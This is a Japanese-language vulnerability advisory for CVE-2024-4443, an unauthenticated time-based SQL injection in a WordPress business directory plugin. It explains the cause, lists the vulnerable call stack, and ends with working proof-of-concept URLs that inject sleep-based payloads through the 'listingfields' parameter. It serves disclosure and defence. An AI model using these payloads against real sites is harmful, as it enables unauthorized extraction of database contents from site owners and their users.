
CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - listingfieldsパラメータを介した認証なしSQLインジェクション
CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - listingfieldsパラメータを介した未認証のSQLインジェクション
説明
WordPress用プラグイン「Business Directory Plugin – Easy Listing Directories for WordPress」は、バージョン6.4.2以前のすべてのバージョンにおいて、'listingfields'パラメータを介した時間ベースのSQLインジェクションに対して脆弱です。これは、ユーザーが指定したパラメータのエスケープ処理が不十分であり、既存のSQLクエリの準備が不十分であることに起因します。この脆弱性により、認証されていない攻撃者が既存のクエリに追加のSQLクエリを追加し、データベースから機密情報を抽出するために利用される可能性があります。
コールスタック
WPBDP__Listing_Search->execute (\business-directory-plugin\includes\helpers\class-listing-search.php:88)
WPBDP__Listing_Search->_traverse_tree (\business-directory-plugin\includes\helpers\class-listing-search.php:185)
WPBDP__Listing_Search->__construct (\business-directory-plugin\includes\helpers\class-listing-search.php:35)
WPBDP__Listing_Search::parse_request (\business-directory-plugin\includes\helpers\class-listing-search.php:214)
WPBDP__Listing_Search::from_request (\business-directory-plugin\includes\helpers\class-listing-search.php:210)
WPBDP__Views__Search->dispatch (\business-directory-plugin\includes\controllers\pages\class-search.php:54)
Poc
URL: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[{{Injection payload}}][1]=
通常のURL: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[1]=

ペイロード(false)のURL: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=0,5,0))+))--+-][1]=

ペイロード(true)のURL: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=1,5,0))+))--+-][1]=
